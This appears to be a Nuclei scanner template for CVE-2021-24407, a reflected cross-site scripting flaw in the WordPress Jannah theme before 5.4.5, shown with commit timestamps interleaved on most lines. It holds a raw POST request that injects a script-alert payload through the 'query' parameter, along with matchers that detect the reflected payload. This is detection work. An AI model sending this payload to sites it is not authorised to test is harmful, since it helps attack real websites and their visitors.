2021-09-15 04:51:50 +00:00
id : CVE-2021-24407
info :
2022-08-29 13:55:23 +00:00
name : WordPress Jannah Theme <5.4.5 - Cross-Site Scripting
2021-09-15 04:51:50 +00:00
author : pikpikcu
severity : medium
2022-08-29 13:55:23 +00:00
description : WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.
2023-09-06 12:09:01 +00:00
remediation : |
Update the Jannah Theme to version 5.4.5 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
2021-09-15 04:51:50 +00:00
reference :
- https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153
- https://nvd.nist.gov/vuln/detail/CVE-2021-24407
2021-09-16 17:29:49 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-16 17:29:49 +00:00
cve-id : CVE-2021-24407
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00161
2023-08-31 11:46:18 +00:00
epss-percentile : 0.52061
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : tielabs
product : jannah
2023-09-06 12:09:01 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : cve,cve2021,wordpress,xss,wp-theme,wpscan
2021-09-15 04:51:50 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-15 04:51:50 +00:00
- raw :
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
2021-09-16 17:16:36 +00:00
action=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>
2021-09-15 04:51:50 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-09-15 04:51:50 +00:00
words :
2021-09-16 17:16:36 +00:00
- '</script><script>alert(document.domain)</script>'
2021-09-15 04:51:50 +00:00
- type : word
part : header
2021-09-16 17:16:36 +00:00
words :
- text/html
2021-09-15 04:51:50 +00:00
- type : status
status :
- 200